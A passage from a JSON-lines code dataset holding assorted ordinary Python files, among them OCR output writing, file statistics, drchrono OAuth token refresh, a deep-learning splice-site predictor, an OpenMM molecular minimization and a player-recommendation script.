'.join(a_line))\n return resulting_lines\n\n\ndef write_lined_result(write_path, ocr_raw_result, with_warnings = False):\n lines_to_write = get_lines_based_on_coords(ocr_raw_result, with_warnings)\n if not lines_to_write:\n print('No lines to write to file...')\n return\n with open(write_path, 'w') as result_file:\n for i, val in enumerate(lines_to_write):\n result_file.write(str(i)+' ')\n result_file.write(val)\n result_file.write('\\n')\n\n\ndef main_routine():\n path = get_file_path()\n if not path:\n return\n langs = get_languages()\n if not langs:\n return\n result = text_recognition(path, langs)\n #write_raw_result(path+'_res.txt', result)\n write_lined_result(path+'_res.txt', result)\n\n\nif __name__=='__main__':\n #python3 script_name.py file_path lang1 lang2 ... 
langN\n #result will be written to _res.txt\n main_routine()\n print('Done')\n","sub_path":"ocr/easy_ocr/get_text.py","file_name":"get_text.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"174856570","text":"import argparse\nimport os\n\n\nfrom terminaltables import AsciiTable\n\n\ndef lines_count(input_file):\n counts = 0\n for _ in input_file:\n counts += 1\n\n return counts\n\n\ndef bytes_count(input_file_path):\n st = os.stat(input_file_path)\n\n return st.st_size\n\n\ndef longest_line(input_file):\n max_length_line = 0\n for line in input_file:\n length_line = len(line)\n if length_line > max_length_line:\n max_length_line = length_line\n\n return max_length_line\n\n\ndef word_counts(input_file):\n words = 0\n for line in input_file:\n words += len(line.split())\n\n return words\n\n\ndef character_counts(input_file):\n characters = 0\n for item in input_file:\n for word in item.split():\n characters += len(word)\n\n return characters\n\n\ndef parse_command_line():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--file\", type=str, help=\"input file path\")\n args = parser.parse_args()\n\n return args\n\n\ndef open_file():\n command_line_arg = parse_command_line()\n file_in_memory = []\n with open(command_line_arg.file, encoding='utf-8') as file:\n for line in file:\n file_in_memory.append(line)\n\n return file_in_memory\n\n\ndef main():\n data_to_process = open_file()\n path_to_file = parse_command_line()\n max_length_lines = longest_line(data_to_process)\n number_of_lines = lines_count(data_to_process)\n size_file = bytes_count(path_to_file.file)\n number_of_words = word_counts(data_to_process)\n characters_counts = character_counts(data_to_process)\n\n result = [\n [\"Max length of string characters\", max_length_lines],\n [\"Number of lines in file is\", number_of_lines],\n [\"File size is\", size_file],\n [\"Number of words in the file is\", number_of_words],\n [\"Character_counts in the file\", characters_counts]\n ]\n\n table = AsciiTable(result)\n table.inner_row_border = True\n print(table.table)\n\n\nif __name__ == \"__main__\":\n file_existence = parse_command_line()\n if os.path.isfile(file_existence.file):\n main()\n else:\n print(\"Please provide file path\")\n exit(0)\n","sub_path":"tasks/statistics_calculation_task.py","file_name":"statistics_calculation_task.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"560976219","text":"import settings\nimport time\nimport requests\nimport threading\n\ndef refreshtoken(isRefresh):\n response = \"\";\n if(isRefresh):\n response = requests.post('https://drchrono.com/o/token/', data={\n 'refresh_token': settings.REFRESH_TOKEN,\n 'grant_type': 'refresh_token',\n 'client_id': settings.SOCIAL_AUTH_DRCHRONO_KEY,\n 'client_secret': settings.SOCIAL_AUTH_DRCHRONO_SECRET,\n 'redirect_uri' : settings.LOGIN_REDIRECT_URL,\n })\n data = response.json();\n settings.ACCESS_TOKEN = data['access_token'];\n settings.REFRESH_TOKEN = data['refresh_token'];\n settings.EXPIRES_IN = data['expires_in'];\n else:\n response = requests.post('https://drchrono.com/o/revoke_token/', data={\n 'client_id': settings.SOCIAL_AUTH_DRCHRONO_KEY,\n 'client_secret': settings.SOCIAL_AUTH_DRCHRONO_SECRET,\n 'token': settings.ACCESS_TOKEN,\n });\n data = response.json()\n print (data)\n\n\ndef countdown_refresh_accesstoken(t):\n t = threading.Timer(t, 
refreshtoken, args=(True,))\n    t.daemon = True\n    t.start()\n","sub_path":"drchrono/refreshtoken.py","file_name":"refreshtoken.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"490188220","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\n\n\n######################### Splice Deep Model Using Python ##########################\n# Author: Somayah.Albaradei@kaust.edu.sa\n \n# Advisor : vladimir.bajic@kaust.edu.sa \n \n \n# Done: May, 2019\n\n \n# Description\n# This script applies the trained Deep Splice models given a DNA sequence of length 602 with the splice site at positions 300-301 :...300N...SS... 300N... \n\n###############################################################################\n\n\n\n\n\n\n# import libraries\nimport pickle\nimport numpy as np\nfrom sys import argv\nimport time\nfrom keras.models import load_model\nfrom keras.preprocessing.image import img_to_array\nimport warnings\nimport tensorflow as tf\nimport os\nfrom tensorflow.python.util import deprecation\ndeprecation._PRINT_DEPRECATION_WARNINGS = False\n\n# read a fasta file, append each sequence to a list and return that list\n\n\ndef TextToList(fileName):\n    dna_list=[]\n    with open(fileName) as file:\n        \n        for line in file:\n            li=line.strip()\n            if not li.startswith(\">\"):\n                dna_list.append(line.rstrip(\"\\n\"))\n    file.close()\n    return dna_list\n\n\n\n\n# split regions around the SS into upstream and downstream parts\n\n\ndef split_up_down(dna_list,sig_str,sig_end,begin,end):\n    down=[]\n    up=[]\n    #short_dna=[]\n    for s in range(len(dna_list)):\n        up.append(dna_list[s][begin:sig_str])\n        down.append(dna_list[s][sig_end:end])\n    return up,down\n\n\n# encode sequence to image (4*L)\n\n\ndef EncodeSeqToMono_4D(dna_list):\n    data=[]\n    image=np.zeros((4,len(dna_list[0])))\n    \n    alphabet = 'ACGT'\n    char_to_int = dict((c, i) for i, c in enumerate(alphabet))\n    int_to_char = dict((i, c) for i, c in enumerate(alphabet))\n    for i in range(len(dna_list)):\n        image=np.zeros((4,len(dna_list[0])))\n        x = dna_list[i]\n        integer_encoded = [char_to_int[char] for char in x]\n        \n        \n        \n        j=0\n        # weighted one-hot encoding: T rows accumulate 2, G rows 1.5, A/C rows 1\n        for value in integer_encoded:\n            if (value==3):\n                image[value][j] += 1\n            if (value==2):\n                image[value][j] += 0.5\n            \n            image[value][j] +=1\n            j=j+1\n        \n        data.append(img_to_array(image))\n    \n    return data\n\n\n# encode sequence to image (64*L)\n\n\ndef EncodeSeqToTri_64D(dna_list):\n    seq=dna_list[0]\n    n=len(seq)\n    profile = { 'AAA':[0]*n,'ACA':[0]*n,'AGA':[0]*n,'ATA':[0]*n,\n                'CAA':[0]*n,'CCA':[0]*n,'CGA':[0]*n,'CTA':[0]*n,\n                'GAA':[0]*n,'GCA':[0]*n,'GGA':[0]*n,'GTA':[0]*n,\n                'TAA':[0]*n,'TCA':[0]*n,'TGA':[0]*n,'TTA':[0]*n,\n\n                'AAC':[0]*n,'ACC':[0]*n,'AGC':[0]*n,'ATC':[0]*n,\n                'CAC':[0]*n,'CCC':[0]*n,'CGC':[0]*n,'CTC':[0]*n,\n                'GAC':[0]*n,'GCC':[0]*n,'GGC':[0]*n,'GTC':[0]*n,\n                'TAC':[0]*n,'TCC':[0]*n,'TGC':[0]*n,'TTC':[0]*n,\n\n                'AAG':[0]*n,'ACG':[0]*n,'AGG':[0]*n,'ATG':[0]*n,\n                'CAG':[0]*n,'CCG':[0]*n,'CGG':[0]*n,'CTG':[0]*n,\n                'GAG':[0]*n,'GCG':[0]*n,'GGG':[0]*n,'GTG':[0]*n,\n                'TAG':[0]*n,'TCG':[0]*n,'TGG':[0]*n,'TTG':[0]*n,\n\n                'AAT':[0]*n,'ACT':[0]*n,'AGT':[0]*n,'ATT':[0]*n,\n                'CAT':[0]*n,'CCT':[0]*n,'CGT':[0]*n,'CTT':[0]*n,\n                'GAT':[0]*n,'GCT':[0]*n,'GGT':[0]*n,'GTT':[0]*n,\n                'TAT':[0]*n,'TCT':[0]*n,'TGT':[0]*n,'TTT':[0]*n}\n\n    idx=list(profile.keys())\n    #print(idx)\n    data=[]\n    labels=[]\n    image=np.zeros((64,n))\n    for seq in dna_list:\n        for i in range(len(seq)-2):\n            tri=seq[i]+seq[i+1]+seq[i+2]\n            if tri in profile.keys():\n                image[idx.index(tri)][i] += 1\n                
#print(idx.index(tri))\n \n data.append(img_to_array(image))\n image=np.zeros((64,n))\n\n return data\n\n\n\n# check seqence and make sure it contains ACGT letters only\n\n\ndef RemoveNonAGCT(dna_list):\n chars = set('ACGT')\n dna_listACGT=[]\n for s in dna_list:\n flag=0\n for c in s:\n if c not in chars:\n flag=-1\n if flag==0:\n dna_listACGT.append(s)\n \n return dna_listACGT \n\n\n\n# load models\n\n\ndef load_pickle(pickle_file):\n try:\n with open(pickle_file, 'rb') as f:\n pickle_data = pickle.load(f)\n except UnicodeDecodeError as e:\n with open(pickle_file, 'rb') as f:\n pickle_data = pickle.load(f, encoding='latin1')\n except Exception as e:\n print('Unable to load data ', pickle_file, ':', e)\n raise\n return pickle_data\n\n\n\n# main function\n\ndef main(org='hs', Input='DoSS_test.fa', Output='1'): \n # variables input\n parameter_dict = {}\n for user_input in argv[1:]: \n if \"=\" not in user_input: \n continue\n varname = user_input.split(\"=\")[0] \n varvalue = user_input.split(\"=\")[1] \n parameter_dict[varname] = varvalue\n\n if \"org\" in parameter_dict:\n print(\"Welcome to splice deep program : \") \n print(\"organism is: \" + parameter_dict[\"org\"])\n else: \n print(\"User did not give a value for organism\")\n \n if \"Input\" in parameter_dict: \n print(\"Input fasta file is: \" + parameter_dict[\"Input\"])\n else: #Or if the user did not define var1 in their list:\n print(\"User did not give a value for file name\")\n \n \n #########################################################\n # set the windosize and SS position\n begin=0\n end=602\n sig_str=300\n sig_end=302\n \n org= parameter_dict[\"org\"]\n \n \n \n global_model = load_model('./models/don_global_model_'+org)\n up_model = load_model('./models/don_up_model_'+org)\n down_model = load_model('./models/don_down_model_'+org)\n finalmodel='./models/don_splicedeep_'+org+'.pkl'\n final_model = load_pickle(finalmodel)\n Data=TextToList('./Data/'+parameter_dict[\"Input\"])\n start = time. time()\n\n test_images=EncodeSeqToMono_4D(Data)\n\n test= np.array(test_images,)\n\n prediction = global_model.predict(test)\n\n globalfeatures_t=prediction.tolist()\n\n # split up and down\n\n test_up, test_down=split_up_down(Data,sig_str,sig_end,begin,end)\n\n\n\n # up model\n\n test_images=EncodeSeqToTri_64D(test_up)\n test= np.array(test_images,)\n\n prediction = up_model.predict(test)\n\n upfeatures_t=prediction.tolist()\n\n #down model\n\n test_images=EncodeSeqToMono_4D(test_down)\n test= np.array(test_images,)\n\n prediction = down_model.predict(test)\n\n dwonfeatures_t=prediction.tolist()\n\n # final model\n d_t=np.zeros((len(Data),6))\n idx=0\n\n\n for idx in range(len(Data)):\n\n d_t[idx][0]=globalfeatures_t[idx][0]\n\n d_t[idx][1]=globalfeatures_t[idx][1]\n\n\n d_t[idx][2]=upfeatures_t[idx][0]\n\n d_t[idx][3]=upfeatures_t[idx][1]\n\n d_t[idx][4]=dwonfeatures_t[idx][0]\n d_t[idx][5]=dwonfeatures_t[idx][1]\n\n\n pred=final_model.predict(d_t)\n \n\n endtime = time. 
time()\n seconds=endtime - start\n m, s = divmod(seconds, 60)\n h, m = divmod(m, 60)\n print (\"Time: %d:%02d:%02d\" % (h, m, s))\n \n \n \n np.savetxt('splicedeep_DoSS_output_'+ parameter_dict[\"Output\"], pred, fmt='%i')\n \n print('see prediction in splicedeep_DoSS_output_'+parameter_dict[\"Output\"]+'.txt file')\n\n\n\n# In[43]:\n\n\n\n\nif __name__ == \"__main__\": \n warnings.filterwarnings(\"ignore\")\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n main(argv)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Splice_Deep_Donor.py","file_name":"Splice_Deep_Donor.py","file_ext":"py","file_size_in_byte":7792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"468306739","text":"import pandas as pd\nimport datetime\n\ndef remove_timezone(data):\n if not type(data.starttime[0]) == datetime.datetime:\n data = convert_timestamps_to_datetime(data)\n data['starttime'] = data['starttime'].apply(lambda dt: dt.replace(tzinfo=None))\n data['endtime'] = data['endtime'].apply(lambda dt: dt.replace(tzinfo=None))\n return data\n\n\ndef convert_timestamps_to_datetime(data):\n print(\"converting start and end timestamps to datetime objects\")\n if not type(data['starttime'][0]) == datetime.datetime:\n data['starttime'] = pd.to_datetime(data['starttime'])\n if not type(data['endtime'][0]) == datetime.datetime:\n data['endtime'] = pd.to_datetime(data['endtime'])\n return data\n","sub_path":"Scripts/utils/temporal_utils.py","file_name":"temporal_utils.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"289527206","text":"# 方法一: dfs\nclass Solution:\n def closedIsland(self, grid: List[List[int]]) -> int:\n if not grid or not grid[0]: return 0\n rows, cols = len(grid), len(grid[0])\n ans = 0\n for r in range(rows):\n for c in range(cols):\n if grid[r][c] == 0:\n ans += self._dfs(r, c, grid)\n return ans\n\n def _dfs(self, r, c, grid):\n if r < 0 or r >= len(grid) or c < 0 or c >= len(grid[0]):\n return 0\n if grid[r][c] == 1:\n return 1\n grid[r][c] = 1\n ret = 1\n for nr, nc in ((r + 1, c), (r - 1, c), (r, c + 1), (r, c - 1)):\n ret = min(ret, self._dfs(nr, nc, grid))\n return ret\n \n# 方法二: bfs\nclass Solution:\n def closedIsland(self, grid: List[List[int]]) -> int:\n if not grid or not grid[0]: return 0\n rows, cols = len(grid), len(grid[0])\n ans = 0\n for r in range(rows):\n for c in range(cols):\n if grid[r][c] == 0:\n ans += self._bfs(r, c, grid)\n return ans\n\n def _bfs(self, r, c, grid):\n d = collections.deque()\n d.append((r, c))\n ret = 1\n rows, cols = len(grid), len(grid[0])\n while d:\n r, c = d.popleft()\n grid[r][c] = 1\n for nr, nc in ((r + 1, c), (r - 1, c), (r, c + 1), (r, c - 1)):\n if nr < 0 or nr >= rows or nc < 0 or nc >= cols:\n ret = 0\n continue\n if grid[nr][nc] == 0:\n d.append((nr, nc))\n return ret\n","sub_path":"1254_NumberofClosedIslands/closedIsland.py","file_name":"closedIsland.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"466903690","text":"import json\n\ndef merge(id_and_clusters):\n the_id = id_and_clusters.split('_')[0]\n clusters = id_and_clusters.split('_')[1]\n jsonFileName = \"sourcedata/\" + the_id + \"_raw.json\"\n idFileName = \"sourcedata/\" + the_id + \"_matrixID.json\"\n clusterFileName = \"sourcedata/\" + the_id + \"_\" + clusters + \".txt\"\n f = open(idFileName, 'r')\n text = f.read()\n nodeId_2_matrixId = 
json.loads(text)\n f.close()\n f = open(clusterFileName, 'r')\n matrixId_2_cluster = ['do_not_use_index_0']\n for line in f.readlines():\n line = line[:-1]\n if line == \"\":\n break\n matrixId_2_cluster.append(line)\n f.close()\n f = open(jsonFileName, 'r')\n txt = f.read()\n source_dict = json.loads(txt.decode(\"utf8\", 'replace'))\n f.close()\n nodes = source_dict.get('node')\n for key in nodes:\n node = nodes[key]\n if node['id'] == the_id:\n node['cluster'] = '300'\n print(\"root node found ...\")\n else:\n node['cluster'] = matrixId_2_cluster[ nodeId_2_matrixId[node['id']] ]\n outFile = open(\"data/\" + id_and_clusters + \".json\", 'w')\n str2write = json.dumps(source_dict, ensure_ascii = False)\n outFile.write(str2write)\n outFile.close()\n","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"76756770","text":"from __future__ import print_function\nfrom simtk.openmm.app import *\nfrom simtk.openmm import *\nfrom simtk.unit import *\nfrom sys import stdout\nfrom time import gmtime, strftime\nfrom datetime import datetime\nimport numpy as np\n\ndef angle(p):\n a,b,c=p[0],p[1],p[2]\n ba = a - b\n bc = c - b\n cosine_angle = np.dot(ba, bc) / (np.linalg.norm(ba) * np.linalg.norm(bc))\n angle = np.arccos(cosine_angle)\n return np.degrees(angle)\n\ndef dihedral(p):\n b = p[:-1] - p[1:]\n b[0] *= -1\n v = np.array( [ v - (v.dot(b[1])/b[1].dot(b[1])) * b[1] for v in [b[0], b[2]] ] )\n # Normalize vectors\n v /= np.sqrt(np.einsum('...i,...i', v, v)).reshape(-1,1)\n b1 = b[1] / np.linalg.norm(b[1])\n x = np.dot(v[0], v[1])\n m = np.cross(v[0], b1)\n y = np.dot(m, v[1])\n return np.degrees(np.arctan2( y, x ))\n\ntemperature=300*kelvin\npdbin=sys.argv[1]\nffin=sys.argv[2]\npdbout=sys.argv[3]\npdb = PDBFile(pdbin)\nstrdir = ''\n\ninteg_md = DrudeLangevinIntegrator(temperature, 1/picosecond, 1*kelvin, 1/picosecond, 0.001*picoseconds)\ninteg_md.setMaxDrudeDistance(0.02) # this should prevent polarization catastrophe during equilibration, but shouldn't affect results afterwards ( 0.2 Angstrom displacement is very large for equil. 
Drudes)\n\npdb.topology.loadBondDefinitions('sapt_residues_choline.xml')\npdb.topology.createStandardBonds();\n\nmodeller = Modeller(pdb.topology, pdb.positions)\nforcefield = ForceField(ffin)\nmodeller.addExtraParticles(forcefield)\n#PDBFile.writeFile(modeller.topology, modeller.positions, open('init.pdb', 'w'))\n\nsystem = forcefield.createSystem(modeller.topology, constraints=None, rigidWater=True)\nnbondedForce = [f for f in [system.getForce(i) for i in range(system.getNumForces())] if type(f) == NonbondedForce][0]\ncustomNonbondedForce = [f for f in [system.getForce(i) for i in range(system.getNumForces())] if type(f) == CustomNonbondedForce][0]\ndrudeForce = [f for f in [system.getForce(i) for i in range(system.getNumForces())] if type(f) == DrudeForce][0]\nnbondedForce.setNonbondedMethod(NonbondedForce.NoCutoff)\ncustomNonbondedForce.setNonbondedMethod(min(nbondedForce.getNonbondedMethod(),NonbondedForce.NoCutoff))\nprint('nbMethod : ', customNonbondedForce.getNonbondedMethod())\n\nfor i in range(system.getNumForces()):\n f = system.getForce(i)\n type(f)\n f.setForceGroup(i)\n\ntotmass = 0.*dalton\nfor i in range(system.getNumParticles()):\n totmass += system.getParticleMass(i)\nsimmd = Simulation(modeller.topology, system, integ_md)\nsimmd.context.setPositions(modeller.positions)\nsimmd.context.reinitialize()\nsimmd.context.setPositions(modeller.positions)\n\nprint('Minimizing...')\nstate = simmd.context.getState(getEnergy=True,getForces=True,getPositions=True)\nposition = state.getPositions()\nnppos=state.getPositions(asNumpy=True)\nprint(str(state.getKineticEnergy()))\nprint(str(state.getPotentialEnergy()))\n\na1atoms=nppos[[14,13,15],:]/(1.0*nanometer)\na2atoms=nppos[[18,17,19],:]/(1.0*nanometer)\na3atoms=nppos[[0,13,16],:]/(1.0*nanometer)\nd1atoms=nppos[[14,13,16,19],:]/(1.0*nanometer)\nd2atoms=nppos[[0,13,16,19],:]/(1.0*nanometer)\nprint('chain Bond angle HCH (beforemin) : ',angle(a1atoms),' ',angle(a2atoms))\nprint('Bond angle NCC (beforemin) : ',angle(a3atoms))\nprint('Dihedral angle HCCO (beforemin) : ',dihedral(d1atoms))\nprint('Dihedral angle NCCO (beforemin) : ',dihedral(d2atoms))\n\nfor i in range(system.getNumForces()):\n f = system.getForce(i)\n print(type(f), str(simmd.context.getState(getEnergy=True, groups=2**i).getPotentialEnergy()))\n\n#PDBFile.writeFile(simmd.topology, position, open(strdir+'beforemin.pdb', 'w'))\nprint('Wrote initial positions')\nsimmd.minimizeEnergy(maxIterations=2000)\n\nprint('Minimization finished !')\nstate = simmd.context.getState(getEnergy=True,getForces=True,getVelocities=True,getPositions=True)\nprint(numpy.max(state.getVelocities()*picosecond/nanometer))\nprint(str(state.getKineticEnergy()))\nprint(str(state.getPotentialEnergy()))\nfor i in range(system.getNumForces()):\n f = system.getForce(i)\n print(type(f), str(simmd.context.getState(getEnergy=True, groups=2**i).getPotentialEnergy()))\n\nposition = state.getPositions()\n#print(position)\nnppos=state.getPositions(asNumpy=True)\na1atoms=nppos[[14,13,15],:]/(1.0*nanometer)\na2atoms=nppos[[18,17,19],:]/(1.0*nanometer)\na3atoms=nppos[[0,13,16],:]/(1.0*nanometer)\nd1atoms=nppos[[14,13,16,19],:]/(1.0*nanometer)\nd2atoms=nppos[[0,13,16,19],:]/(1.0*nanometer)\nprint('chain Bond angle HCH (aftermin) : ',angle(a1atoms),' ',angle(a2atoms))\nprint('Bond angle NCC (beforemin) : ',angle(a3atoms))\nprint('Dihedral angle HCCO (aftermin) : ',dihedral(d1atoms))\nprint('Dihedral angle NCCO (aftermin) : ',dihedral(d2atoms))\n\nPDBFile.writeFile(simmd.topology, position, open(strdir+pdbout, 
'w'))\n\n#*************************************\n#*************************************************\n# ChangYun created the DrudeDataReporter class, we need to pull this into this OpenMM install if we want to use it\n#*************************************************\n#simmd.reporters.append(DrudeDataReporter(strdir+'md_nvt.log', 1000, step=True, time=True, potentialEnergy=True, kineticEnergy=True, totalEnergy=True, temperature=True, langevin=True, density=False,speed=True))\n#simmd.reporters.append(DrudeDataReporter(strdir+'md_nvt_temp.log', 10000, step=True, time=True, potentialEnergy=True, kineticEnergy=True, totalEnergy=True, temperature=True, langevin=True, drudeTemperature=True,density=False,speed=True))\n#simmd.reporters[2].report(simmd,state)\n\n#for i in range(simmd.system.getNumForces()):\n#    if type(simmd.system.getForce(i)) == MonteCarloBarostat:\n#        simmd.system.removeForce(i)\nprint('Done!')\n\nexit()\n","sub_path":"py_development/data_process/sapt_dimer/monmin_test.py","file_name":"monmin_test.py","file_ext":"py","file_size_in_byte":5650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"146870864","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport numpy as np\nimport pandas as pd\nimport os\nimport geopy\nfrom geopy.distance import vincenty\nsource_path = os.path.join(os.getcwd(),'Source')\nmodel_path = os.path.join(os.getcwd(),'Model')\nplayer_pattern=pd.read_csv(os.path.join(source_path,'player_pattern.csv'))\nfield = pd.read_excel(os.path.join(source_path,'field.xlsx'))\ndef calculateDistance(rowA,rowB):\n    a = rowA['latitude'],rowA['longitude']\n    b = rowB['latitude'],rowB['longitude']\n    return vincenty(a, b).kilometers\n# compute each player's play probability for each (day, time) slot\ndef calculate(player):\n    dataset = player_pattern[player_pattern['player']==player]\n    p_0_0 = len(dataset[(dataset['day']==0) & (dataset['time']==0)])\n    p_0_1 = len(dataset[(dataset['day']==0) & (dataset['time']==1)])\n    p_1_0 = len(dataset[(dataset['day']==1) & (dataset['time']==0)])\n    p_1_1 = len(dataset[(dataset['day']==1) & (dataset['time']==1)])\n    array = np.array(map(lambda x:float(x),[p_0_0,p_0_1,p_1_0,p_1_1])) / len(dataset)\n    return array.tolist()\nprobability = {}\nfor player in set(player_pattern['player']):\n    result = calculate(player)\n    probability[player] = {(0,0):result[0],(0,1):result[1],(1,0):result[2],(1,1):result[3]}\ndef makeClass(price):\n    if price >= 1100.0:\n        return \"A\"\n    elif price < 700:\n        return \"C\"\n    else:\n        return \"B\"\nfield[\"class\"] = map(lambda x:makeClass(x),field['price'])\nmerged = pd.merge(player_pattern,field,on=\"location\",how=\"left\")\ndef calculateitemPercentage(items):\n    output = {}\n    for key in set(items):\n        output[key] = 0\n    for item in items:\n        output[item] +=1\n    for key in set(items):\n        output[key] = float(output[key]) / len(items)\n    return output\n###Class P\ndef calculateClassP(player):\n    Class = list(merged[merged['player']==player]['class'])\n    classP =calculateitemPercentage(Class)\n    df = pd.DataFrame([classP.values()],columns=classP.keys())\n    df.index = [player,]\n    return df\nclassesP = pd.DataFrame()\nfor player in set(player_pattern['player']):\n    df = calculateClassP(player)\n    classesP = classesP.append(df)\nclassesP.fillna(0,inplace=True)\n#Location P\ndef calculateLocationP(player):\n    Location = list(merged[merged['player']==player]['location'])\n    locationP =calculateitemPercentage(Location)\n    df = pd.DataFrame([locationP.values()],columns=locationP.keys())\n    df.index = [player,]\n    return df\nlocationP = pd.DataFrame()\nfor player in set(player_pattern['player']):\n    df = calculateLocationP(player)\n    locationP = locationP.append(df)\nlocationP.fillna(0,inplace=True)\n\n\n# In[2]:\n\ndef project1(Field,KM,play_count,FieldP,day,time,count):\n    #calculate distance\n    selected_field = field[field['location'] == Field].iloc[0]\n    players_data = player_pattern[['player','home']].drop_duplicates(subset=[\"player\",\"home\"])\n    players_data = pd.merge(players_data,field,left_on=\"home\",right_on=\"location\",how=\"left\")\n    players_data = players_data[['player','home','longitude','latitude','location']]\n    players_data['distance'] = map(lambda x:calculateDistance(selected_field,players_data.loc[x]),players_data.index)\n    #select neighbors\n    players_data = players_data[players_data['distance'] <= KM]\n    #calculate total play count and filter\n    players_data[\"play_count\"] = map(lambda x:len(player_pattern[player_pattern[\"player\"] == x]),players_data['player'])\n    players_data = players_data[players_data['play_count'] >= play_count]\n    players_data.set_index('player',inplace=True)\n    # keep players whose probability of playing at field X is < Y\n    selected_player = locationP[locationP[Field] <= FieldP].index\n    players_data = players_data.loc[selected_player].dropna()\n    # filter by field class\n    Class = field[field['location']==Field]['class'].iloc[0]\n    if Class == \"A\":\n        selected_player = classesP[(classesP[\"A\"]>0) & (classesP[\"B\"]>0)].index\n    elif Class == \"B\":\n        selected_player = classesP.index\n    elif Class == \"C\":\n        selected_player = classesP[(classesP[\"B\"]>0) & (classesP[\"C\"]>0)].index\n    players_data = players_data.loc[selected_player].dropna()\n    #To DF\n    selected_player = list(players_data.index)\n    df = pd.DataFrame(selected_player,columns=['player'])\n    df['probability'] = map(lambda x:probability[x][(day,time)],df['player'])\n    df = df.sort_values(['probability'],ascending=False)\n    df.set_index(\"player\",inplace=True)\n    return df[\"probability\"][:count]\n\n\n# In[3]:\n\ndef project2(Field,KM,play_count,day,time,count):\n    #calculate distance\n    selected_field = field[field['location'] == Field].iloc[0]\n    players_data = player_pattern[['player','home']].drop_duplicates(subset=[\"player\",\"home\"])\n    players_data = pd.merge(players_data,field,left_on=\"home\",right_on=\"location\",how=\"left\")\n    players_data = players_data[['player','home','longitude','latitude','location']]\n    players_data['distance'] = map(lambda x:calculateDistance(selected_field,players_data.loc[x]),players_data.index)\n    #select neighbors\n    players_data = players_data[players_data['distance'] <= KM]\n    #calculate total play count and filter\n    players_data[\"play_count\"] = map(lambda x:len(player_pattern[player_pattern[\"player\"] == x]),players_data['player'])\n    players_data = players_data[players_data['play_count'] >= play_count]\n    players_data.set_index('player',inplace=True)\n    # filter by field class\n    Class = field[field['location']==Field]['class'].iloc[0]\n    if Class == \"A\":\n        selected_player = classesP[(classesP[\"A\"]>0) & (classesP[\"B\"]>0)].index\n    elif Class == \"B\":\n        selected_player = classesP.index\n    elif Class == \"C\":\n        selected_player = classesP[(classesP[\"B\"]>0) & (classesP[\"C\"]>0)].index\n    players_data = players_data.loc[selected_player].dropna()\n    #To DF\n    selected_player = list(players_data.index)\n    df = pd.DataFrame(selected_player,columns=['player'])\n    df['probability'] = map(lambda x:probability[x][(day,time)],df['player'])\n    df = df.sort_values(['probability'],ascending=False)\n    df.set_index(\"player\",inplace=True)\n    return df[\"probability\"][:count]\n\n\n# In[4]:\n\ndef calculateFarP(player,KM2):\n    player = player_pattern[player_pattern[\"player\"]==player]\n    merged = pd.merge(player,field,on=\"location\",how=\"left\")\n    merged = merged[['player','home','longitude','latitude']]\n    home = field[field['location']==list(set(merged['home']))[0]].iloc[0]\n    merged['distance'] = map(lambda x:calculateDistance(home,merged.loc[x]),merged.index)\n    merged['bigger'] = merged['distance'] >= KM2\n    try:\n        return calculateitemPercentage(merged['bigger'])[True]\n    except KeyError:\n        return 0.0\n\ndef project3(Field,KM,play_count,KM2,farP,day,time,count):\n    #calculate distance\n    selected_field = field[field['location'] == Field].iloc[0]\n    players_data = player_pattern[['player','home']].drop_duplicates(subset=[\"player\",\"home\"])\n    players_data = pd.merge(players_data,field,left_on=\"home\",right_on=\"location\",how=\"left\")\n    players_data = players_data[['player','home','longitude','latitude','location']]\n    players_data['distance'] = map(lambda x:calculateDistance(selected_field,players_data.loc[x]),players_data.index)\n    #select non-neighbors\n    players_data = players_data[players_data['distance'] >= KM]\n    #calculate total play count and filter\n    players_data[\"play_count\"] = map(lambda x:len(player_pattern[player_pattern[\"player\"] == x]),players_data['player'])\n    players_data = players_data[players_data['play_count'] >= play_count]\n    ## keep players whose probability of playing farther than X km away is > Y\n    players_data[\"farP\"] = map(lambda x:calculateFarP(x,KM2),players_data['player'])\n    players_data = players_data[players_data['farP'] >= farP]\n    players_data.set_index('player',inplace=True)\n    # filter by field class\n    Class = field[field['location']==Field]['class'].iloc[0]\n    if Class == \"A\":\n        selected_player = classesP[(classesP[\"A\"]>0) & (classesP[\"B\"]>0)].index\n    elif Class == \"B\":\n        selected_player = classesP.index\n    elif Class == \"C\":\n        selected_player = classesP[(classesP[\"B\"]>0) & (classesP[\"C\"]>0)].index\n    players_data = players_data.loc[selected_player].dropna()\n    #To DF\n    selected_player = list(players_data.index)\n    df = pd.DataFrame(selected_player,columns=['player'])\n    df['probability'] = map(lambda x:probability[x][(day,time)],df['player'])\n    df = df.sort_values(['probability'],ascending=False)\n    df.set_index(\"player\",inplace=True)\n    return df[\"probability\"][:count]\n\n\n","sub_path":"apply2.py","file_name":"apply2.py","file_ext":"py","file_size_in_byte":8498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"141554219","text":"# encoding: utf-8\nimport sys\nimport os\nimport unittest\nimport inspect\n\ntest_dir = os.path.abspath(os.path.dirname(__file__))\nsys.path.insert(0, os.path.abspath(os.path.join(test_dir, '..')))\n\n\nclass PipesTest(unittest.TestCase):\n\n    def setUp(self):\n        from shpipes import Commands\n\n        os.environ['PATH'] = 